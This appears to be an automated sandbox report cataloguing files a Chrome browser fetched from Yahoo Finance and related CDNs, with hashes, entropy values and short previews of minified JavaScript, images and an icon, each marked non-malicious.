                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:bMgnyi5r63WkHMyApxb2973AAQHkRTPzZXY0xXOPqDYrNzcih:bMgyi56Gaf822URDzZoc0Mezdh
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:76E558E47A159109C81CF98B4D71CE92
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:A02AD5C6383138BCF69EC07000326A23115FA3A5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:424F4B32EA612C8A4B49B671A52F2A51B4CE2C0B9D37EB43265671E6F1082BA1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:143A17099EE3E706E59FF5D241678A849F9DDC5316DEEC14DCD82A9DECFE95B65F6B66D049B2223DD06664B8D94724BD82E16B2DD111F5557BD1FA0D0EB93DF6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/logUtil.CCV3qKPL.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as v}from"./commonUtil.BWwawKjd.js";const N=({label:e,request:r=null,response:t=null,context:s,time:a})=>{typeof window<"u"||(s.parent&&typeof s.request>"u"?s.parent().then(({stores:n,session:o})=>{const{isDebug:i=!1}=o;i&&(console.log(JSON.stringify({duration:a[1]-a[0],label:e,request:r,response:t,time:a})),n.debug.addPerf({label:e,request:r,response:t,time:a}))}):(s.locals||(s.locals={}),s.locals.perf||(s.locals.perf=[]),s.locals.perf.push({label:e,request:r,response:t,time:a})))};function q(e,r){console.error("Logger Error:",e,r)}function P(e,r){if(e.name==="AbortError"){const t=new Error("Request timed out",{cause:e});throw q({message:"Request timed out",status:408},r),t}throw q(e,r),e}function T(e,{includeResponse:r=!1}={}){if(!e.ok){const t=new Error(e.statusText);throw t.status=e.status,t}return e.text().then(t=>{let s=t;try{s=JSON.parse(t)}catch{}return r?[s,e]:s})}function U(e){return(r,t)=>{const s=typeof e=="function"?e:fetch,a=(t==null?void 0:t.timeout)||3e3,n=new
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (30599)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):39259
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.45557904507731
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:WCGwi1LSavParYzcHN64C32j1zNeAmRymiB9ukCC3nKYRWauVyaqYX6VZn3Wf/La:WD9nyLCSgQbVWS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:174A101C3DBE2877566569641FEEC931
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:56F03C23357169AB67794BEB03079733A078B5CB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:98C9197C4F688AED8389354618E28706AE8F678FD9CF920E585E1E2E9861BAB6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:88925A0A08ED09F3B11007FF3442B5231307F427CA562EDA31C2C765E283F3A2AA8658D7F30F24BF009AB39ED342C0E789FBC3E38FD797537FF5F503B24BFEA2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const __vite__fileDeps=["./Debug.CbytgeI4.js","./scheduler.Dsuh-FKt.js","./index.CvwOawEI.js","./each.CI2tb2RB.js","./commonUtil.BWwawKjd.js","./stores.BCwnb1-k.js","./43.BgWy8GOF.js","./control.CYgJF_JY.js","./Button.C2rixdaC.js","./spread.CgU5AtxT.js","./Icon.C8w5V9EK.js","../assets/Icon.DgFg0-NP.css","./i13nUtil.8E8_gCdn.js","../assets/Button.D4GRMVdO.css","./expand_more.DscV4c36.js","./Select.DMUNtRO-.js","./check.21reEWCG.js","./a11y-dialog.esm.BnYZCIGX.js","../assets/Select.G4QVlChI.css","./close.C3ug6nNR.js","./AccordionItem.Bf1KTDMO.js","./index.CwoOB1cS.js","../assets/AccordionItem.COAy-xrR.css","./Link.vSNQugO0.js","../assets/Link.CHR7GGSC.css","./Switch.5Dhu_-MN.js","../assets/Switch.BaMlRiYx.css","./ads.DhuB_mth.js","./Tab.cTfs0lLE.js","./Tabs.6aO2IOBS.js","./Tooltip.CzSuDxyY.js","./floating-ui.dom.C5fi-pG6.js","../assets/Tooltip.IRw8ojlh.css","./yf-lock.ClgspVU1.js","./yf-unlock.DelAiXlN.js","../assets/Tabs.agUa80w0.css","../assets/Debug.SsTdzNxF.css"],__vite__mapDeps=i=>i
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (7213)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):7214
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.214208203980227
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:ZKgIGQGIZVUhgGy8H72At6G+JsX/D9qYLYsGZKUG:xIrDV+xZ2AtewxLkNu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:DADA04F94A4FC4D19AC57A29F0BEAB05
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:ABBC9E83436AEC35D71F4CAE162B49F31821E135
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A9C978CE0E816FE6148ABDC5B90980B165BE9E12E49F068A2504291901C229DB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:A015C1EBAA29F1F12E00E7AF72D92D65C14DFF3EC618AF100BF0B651B8FA0A61B05C25611D343E6AB7ACC8DCDF58E7D6A8E14884BDC7D2E3AEE723E6FF80B5AC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/cx/pv/perf-vitals_3.3.0.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(){"use strict";var e,t=-1,n=function(e){addEventListener("pageshow",(function(n){n.persisted&&(t=n.timeStamp,e(n))}),!0)},r=function(){var e=self.performance&&performance.getEntriesByType&&performance.getEntriesByType("navigation")[0];if(e&&e.responseStart>0&&e.responseStart<performance.now())return e},i=function(){var e=r();return e&&e.activationStart||0},a=function(e,n){var a=r(),o="navigate";return t>=0?o="back-forward-cache":a&&(document.prerendering||i()>0?o="prerender":document.wasDiscarded?o="restore":a.type&&(o=a.type.replace(/_/g,"-"))),{name:e,value:void 0===n?-1:n,rating:"good",delta:0,entries:[],id:"v4-".concat(Date.now(),"-").concat(Math.floor(8999999999999*Math.random())+1e12),navigationType:o}},o=function(e,t,n){try{if(PerformanceObserver.supportedEntryTypes.includes(e)){var r=new PerformanceObserver((function(e){Promise.resolve().then((function(){t(e.getEntries())}))}));return r.observe(Object.assign({type:e,buffered:!0},n||{})),r}}catch(e){}},c=function(e,t,n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4280
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.703938441913305
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:o4Gtl5ysr3B2Lxpcr5TOZkVN2HbWeTzacwHKTBcz6aFLoHqV:9GtlksbBi45SEN2HTzzwHKTBU6qLF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:BEA398AD5C9A37547328CC541CF00687
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:A02ACD9E4DA43E4A33ECBF6AEA54323A3F06F211
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:BCD72100AF950051A1C0B7B59895D3F2D95A30814A021BE02465A14C97659ADD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:2D162827ADC314641851E8049ABFE2DC1919506034318DD94F0B90C7AE35F9B71A8809EF94861484D700B8C93FCF260C2AB3BBD8EF53E6904FEF0FEA757D857D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/uu/api/res/1.2/RonKuGAd5Xs1CsylZkR9Og--~B/Zmk9c3RyaW07aD0xODA7cT04MDt3PTM1NjthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-09/88364cc0-7f3c-11ef-9e6d-608bb5010780.cf.webp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:RIFF....WEBPVP8X.... ...c.....ICCP0......0ADBE....mntrRGB XYZ ............acspAPPL....none...........................-ADBE................................................cprt.......2desc...0...kwtpt........bkpt........rTRC........gTRC........bTRC........rXYZ........gXYZ........bXYZ........text....Copyright 1999 Adobe Systems Incorporated...desc........Adobe RGB (1998)................................................................................XYZ .......Q........XYZ ................curv.........3..curv.........3..curv.........3..XYZ ..........O.....XYZ ......4....,....XYZ ......&1.../....VP8 Z....e...*d...>y<.I$..,.r.J...g-...V...%..e......|...A...Z....h".........x....CfK.K.W..:X.. (......H.?4z....Z=...N.*..s./+[/'h"..N.2p.4!...H....=.;c.|7.#.n.....T....eg.Y....%..*.9<.......<.../.$L...s7.....ur.lf...-....Gp..=.|*.c..#W.........Wyg.>#....Vq.k\y...^...n..t@..UC>..:'.....r]..z..*.}....m.`..$..w."..yy#.}.Ef.D..6.z`..4.%;..&.Cv...@]Cu..V.f....d....t..k....G..@[.v:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (6883)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):6884
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.498216720605911
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:Ud8a79Jn9kziweoH9NAlLXTdNaYhd+PLV/TTtj17zS5n6c7lT7n02zrbPSwlL/Mu:UKa7T9kbTyLXBPYtrzSZpn5WwlY3ZM
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:E9A8DBB7EE04E3112FCF282F27BC720A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:9F92CD5326A3202BBCF4F2EA62DC7E1C9E2ED7EA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:49025C5E11EC6A6118880790284B7E306CB4C1381BDC7AED076CB0A2AA67D0D8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:51230CBD71112CEBECBBC2D022ED8A114CA4C7CF93F02584E712FFE97E5079A9477BA00677873E912D1F4805BF771E70D5D991D5C8DCC6F3779EC99EABD3D1EB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as je,c as F,e as q,b as Y,d as P,f as V,j as I,i as E,q as B,O as R,L as D,k as J,l as k,u as G,g as K,a as U,I as Ee,A as Me,t as me,h as _e,B as oe,J as Le,m as Se,Q as se}from"./scheduler.Dsuh-FKt.js";import{S as Ne,i as Ce,t as Z,a as x}from"./index.CvwOawEI.js";import{g as Be}from"./spread.CgU5AtxT.js";import{c as ae,f as fe,o as re,d as ke,s as Oe,a as Ae}from"./floating-ui.dom.C5fi-pG6.js";const Te=i=>({}),ue=i=>({}),pe=i=>({}),ce=i=>({});function de(i){let t;return{c(){t=q("div"),this.h()},l(l){t=P(l,"DIV",{class:!0}),V(t).forEach(E),this.h()},h(){B(t,"class","arrow yf-7dju6j")},m(l,o){J(l,t,o)},d(l){l&&E(t)}}}function He(i){let t,l,o,m=[{class:o=`title ${i[8]}`},i[5]?{id:i[5]}:{}],_={};for(let a=0;a<m.length;a+=1)_=Me(_,m[a]);return{c(){t=q("h3"),l=me(i[3]),this.h()},l(a){t=P(a,"H3",{class:!0});var y=V(t);l=_e(y,i[3]),y.forEach(E),this.h()},h(){oe(t,_),D(t,"yf-7dju6j",!0)},m(a,y){J(a,t,y),k(t,l)},p(a,y){y[0]&8&&Le(l,a[3],_.contenteditable),oe(t,_=Be(m,[y[0]&256&&o!==
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://pbs.yahoo.com/setuid?bidder=criteo&gdpr=0&gdpr_consent=&gpp=DBAA&gpp_sid=-1&f=i&uid=k-3SgYYRgO8KCVcYjD__uE9zQxVc6YWccgVj7zOg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):247
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.417739541804018
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:H69mc4sl3O4ZDLzc6XxlIXtFoFY3FYXtHwHXW7IVoXtHwHXW7yz:a1PZLzc6BSnoYKdUSIVodUSa
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:0C7E4F0571F3A9FFF611B64B54CB8BB8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:5285D474E876354196B6C434C15C9E732A44DFEB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:DCE077EA95B600945113399EEAA2A98E95156F43C36C1C12019045FFDED51ED5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:8870008B63F5BDF6A519F16AEFF721252F77E39214E89C93D7FFAD582FD71B86914070DC55D5D62801C238163720D555C1CF1AFF57FB90F0C9DBE8608E469756
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const s='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8c1.1 0 2-.9 2-2s-.9-2-2-2-2 .9-2 2 .9 2 2 2m0 2c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2m0 6c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2"/></svg>';export{s as K};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):48316
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.6346993394709
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (760)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):761
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.274907688803793
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:qVeh4dheUghAgtzE4NAtnIZESKxSEoFYEsstzkRWtTazMfjIDo4djfccaPIfqLNg:uJdheUnlXsEtxSRs5RWtXaO9QwNAkqsO
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:67B313B9207E745856532D2A09C1BEE4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:570782E4CFCB4B51249BCE008D640EBED1733451
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:62B5FF2D52A6E4895F6E31265456B202B1DA395ED7B9C5447FDC0FDCCA89A651
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:3151595D518FA66C808CE1B1D0AE3E98C78EA69052F4641BDBBB22C2A5684D049AF1E5DE9BEE500BB35F7F1B778A51D3F790E1DE2E3C56CB13214BBD0885BE28
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{f as o,l as d}from"./logUtil.CCV3qKPL.js";import{c as f}from"./commonUtil.BWwawKjd.js";import{l as y}from"./loadQuote.BOFhtUlf.js";async function m(r,{count:l=15,silent:n=!1,reuse:s=!1}){const[i]=await f(["recentlyViewedTickers"],r),t=i.getRecentlyViewedTickers();if(s&&(t!=null&&t.length))return t;try{const a=await o(r,{isRelative:!0,pathname:"/xhr/recently-viewed-tickers",perfLabel:"loadRecentlyViewedTickers",query:{}}),e=(a==null?void 0:a.slice(0,l))||[];if(e&&e.length>0)try{await y(r,{fields:["longName","regularMarketPrice","regularMarketChange","regularMarketChangePercent","shortName","priceHint"],symbols:e})}catch{}return n||i.updateRecentlyViewedTickers(e),e}catch(c){d(r,{},{data:c,perfLabel:"loadRecentlyViewedTickers"})}}export{m as l};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (52378), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):52378
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.196358037487595
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:F/hU74rh/btNnpJLyuwJqn254eiszi9A9uVfk6+R/gr4a9a+w9s2woV45vmrtjBE:VaEbtNptwqnWRy9a+bVoVe+rt+
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:9AC7123346F757358B219D566DFF6ABA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:0306F6D8473C43501B0FE6FD494CC943594D51EB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:19256D0C7F647AC7DFD1E4CD57E90FA207BC3B53B2240584735FE5EA008EF130
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:0E459BB592D1B768AFA87A48BE8E756B0CDEB6E0B2D95ED50AC4FB986878CCB829CC061B45AC56375AF940D9C47B0A4A69EE4DD40224C5D7BDA9575CA4851CFF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://static-cdn.spot.im/production/launcher/tags/v3.23.0/launcher/450-bundle.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:(self.webpackChunk_spotim_launcher=self.webpackChunk_spotim_launcher||[]).push([[450],{97939:(e,t,n)=>{"use strict";e.exports=n(47389)},47389:function(e,t,n){var r,i=this&&this.__extends||(r=function(e,t){return r=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}||function(e,t){for(var n in t)Object.prototype.hasOwnProperty.call(t,n)&&(e[n]=t[n])},r(e,t)},function(e,t){if("function"!=typeof t&&null!==t)throw new TypeError("Class extends value "+String(t)+" is not a constructor or null");function n(){this.constructor=e}r(e,t),e.prototype=null===t?Object.create(t):(n.prototype=t.prototype,new n)}),o=this&&this.__generator||function(e,t){var n,r,i,o,u={label:0,sent:function(){if(1&i[0])throw i[1];return i[1]},trys:[],ops:[]};return o={next:a(0),throw:a(1),return:a(2)},"function"==typeof Symbol&&(o[Symbol.iterator]=function(){return this}),o;function a(o){return function(a){return function(o){if(n)throw new TypeError("Generator is already executing.");for(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (5773)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):5774
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.327225232341942
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:motitk6L3rFAgGw7NXVkMk0Sk07xY09oGqbvhckGYc+jsk0Y59F05a9/ZlMVny8s:moQGM36gt+7I2W09oGqbvhrGYc+jb0YN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:00349D44A1DD06CF04811362713945C6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:0BD511F8EE821341DECE89C8082AC2179C239949
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:5D32820A8619482AE6842239D50CC3D5DD05D7D9C5A030EE4FDD7B817DFA1EEB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:39C10F6494BEA755B9CA880E26D9A9E12BA0BD291D2CB4309C6D405FD61FDDA2B2EC438A4E46F295496821A8A1975C52361FED66B9D8E6D0A7F0DDFA22F60BC2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/marketsUtil.CypAdIhq.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{r as t}from"./commonUtil.BWwawKjd.js";const E={ns:"markets"};var k=(e=>(e.OVERVIEW="overview",e.INDICES="world-indices",e.FUTURES="commodities",e.BONDS="bonds",e.CURRENCIES="currencies",e.OPTIONS="options",e.SECTORS="sectors",e.STOCKS="stocks",e.CRYPTO="crypto",e.ETF="etfs",e.MUTUALFUNDS="mutualfunds",e))(k||{});const R={stocks:"equity",crypto:"cryptocurrency",etfs:"etf"},I=e=>e==="stocks"||e==="crypto"||e==="etfs"?R[e]:"",g={overview:{id:"OVERVIEW",uri:t({category:"overview"})},stocks:{id:"STOCKS",fields:["ticker","symbol","longName","shortName","regularMarketPrice","regularMarketChange","regularMarketChangePercent","regularMarketVolume","averageDailyVolume3Month","marketCap","trailingPE","fiftyTwoWeekChangePercent","fiftyTwoWeekRange","regularMarketOpen","longName","sparkline"],scrIds:{"most-active":"MOST_ACTIVES",gainers:"DAY_GAINERS",losers:"DAY_LOSERS","52-week-gainers":"FIFTY_TWO_WK_GAINERS","52-week-losers":"FIFTY_TWO_WK_LOSERS"},tabs:["most-active","trending","gainers","
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):20956
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.966116374238142
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:7bXrasVWBUd0gZjak8oT0d6Gf7W6Wkino6d78qR4WUnEXp8w1RMLAz1y:7bbasVWBUigWoT0EGf7zL2v8jPEXqwrU
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:574408D007BDD73AAC2A0C0E764ECD69
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:564F0FEFAB4D5D0F18718EAC930A88E81AD35DF9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:9E00E25F351C2E008E34A438AD022E3353632145366C1609398D8869FE551BFC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B9D26B94FECA2FBD091AD2D7B104E4654E9238FF89E7E8E3A9F2379B220A0E5B21BEB4C33CB77CAA9507C9A5C231EA0E81F1A35894CB3B18B13BCE3DC5C845AC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/uu/api/res/1.2/D1cC99bQYm9QVoUbD_Rpnw--~B/Zmk9c3RyaW07aD0xODA7cT04MDt3PTM1NjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/usa_today_tech_153/03d01cbdd7ccafd738da286245b9f503.cf.webp
